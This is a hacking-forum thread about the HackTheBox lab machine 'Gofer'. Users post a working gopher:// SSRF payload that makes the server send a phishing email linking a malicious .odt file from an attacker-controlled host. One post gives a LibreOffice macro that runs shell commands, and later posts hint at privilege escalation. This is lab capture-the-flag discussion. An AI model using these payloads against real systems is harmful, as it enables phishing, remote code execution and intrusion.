Gofer - Thread
by chickensaladsand - Sunday July 30, 2023 at 07:10 AM
#11
(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: he post combolist in database forum
#12
[quote =“frfrfrfrfrfrf”pid ='81493'日期线='1690745736']
试试这个:gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E% 250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue% 2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word% 20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>这个</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d% 250a
[/引用]

基于这个poc,我不能使用他,你能帮我吗
#13
(Jul 31, 2023, 02:54 AM)chickensaladsand Wrote:
(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work.

I created mine manually. The macro isn't complicated:

Sub Main
    Shell("<CMD>")
End Sub

You can do this in LibreOffice Writer.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
#14
Has anyone finished it, can I ask?
#15
thanks for the information friend
#16
May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"
#17
(Jul 31, 2023, 01:09 PM)BaiHu Wrote: May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"

The macro goes in a malicious odt file

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
#18
https://breachforums.rs/Thread-HTB-Gofer-witreup
#19
(Jul 31, 2023, 09:36 PM)deathfrom Wrote: I am stuck on the pwn challenge for root. Any suggestions?

Try reversing it. It's not a traditional BOF btw. If you play with the options, you'll be able to overwrite user privs to get admin status. The rest is, essentially, wildcard injection.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
#20
(Aug 01, 2023, 12:04 AM)breher Wrote: hey guys. Also very stuck at this final pwn challenge. Can someone give a suggestion how to become an admin with this app?
not really a reversing guy

Case 8 is important.. Look what it does, if you don't know what the syntax does, google it. understand what 0x.. means and how to translate it to a normal thing


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 106 10,165 1 hour ago
Last Post: kkkreoifezrg
  JET fortress writeup + flags ssrf 39 19,170 2 hours ago
Last Post: vlxw
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 29 1,808 5 hours ago
Last Post: mus1c0
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 52 4,441 8 hours ago
Last Post: 0xdarkdharma
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 395 98,931 8 hours ago
Last Post: 0xdarkdharma

Forum Jump:


 Users browsing this forum: 1 Guest(s)